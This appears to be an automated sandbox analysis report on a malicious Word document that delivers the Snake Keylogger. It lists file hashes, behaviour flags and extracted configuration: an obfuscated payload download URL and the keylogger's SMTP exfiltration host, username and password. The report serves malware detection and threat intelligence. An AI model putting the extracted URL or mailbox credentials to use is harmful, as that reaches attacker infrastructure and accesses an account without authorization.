General
-
Target
SCREENSHOT SWIFT MARCH.docx.doc
-
Size
10KB
-
Sample
230322-vsjlwscb3x
-
MD5
c0c359300612d9461aa517a963259d58
-
SHA1
1c0150ee52c12ff1191d3283287ad42e1150b1ae
-
SHA256
e373c9158dd1c3dee8e680362ffa9e2e755ac6664b4785c06e5b7e207678f9b3
-
SHA512
61256d7c26444d815d41883eec301ae4dbb60673e402cfea9389c4993c0a8b23fd02b3233daf7279b690034be243ffb89a0ca7f6ecd9a49012a18b45a5fb4651
-
SSDEEP
192:ScIMmtP1aIG/bslPL++uOrj6l+CVWBXJC0c332:SPXU/slT+LOruHkZC9m
Static task
static1
Behavioral task
behavioral1
Sample
SCREENSHOT SWIFT MARCH.docx
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
SCREENSHOT SWIFT MARCH.docx
Resource
win10v2004-20230220-en
Malware Config
Extracted
http://OASOSIDFOSWEROEROOWRWERWEREWWW0W83W338W83WOWRWWRWRWRW9W9R9W9R9WR9W9RW9R9W9R9W9R0WR7RR7W7RW7RRW7R66WSD6DSD6S6D6DSD66D6S@1755852395/19...............................19..............DOC
Extracted
snakekeylogger
Protocol: smtp- Host:
us2.smtp.mailhostbox.com - Port:
587 - Username:
002@frem-tr.com - Password:
jCXzqcP1 daniel 3116
Targets
-
-
Target
SCREENSHOT SWIFT MARCH.docx.doc
-
Size
10KB
-
MD5
c0c359300612d9461aa517a963259d58
-
SHA1
1c0150ee52c12ff1191d3283287ad42e1150b1ae
-
SHA256
e373c9158dd1c3dee8e680362ffa9e2e755ac6664b4785c06e5b7e207678f9b3
-
SHA512
61256d7c26444d815d41883eec301ae4dbb60673e402cfea9389c4993c0a8b23fd02b3233daf7279b690034be243ffb89a0ca7f6ecd9a49012a18b45a5fb4651
-
SSDEEP
192:ScIMmtP1aIG/bslPL++uOrj6l+CVWBXJC0c332:SPXU/slT+LOruHkZC9m
Score10/10-
Snake Keylogger payload
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Accesses Microsoft Outlook profiles
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory
-
Suspicious use of SetThreadContext
-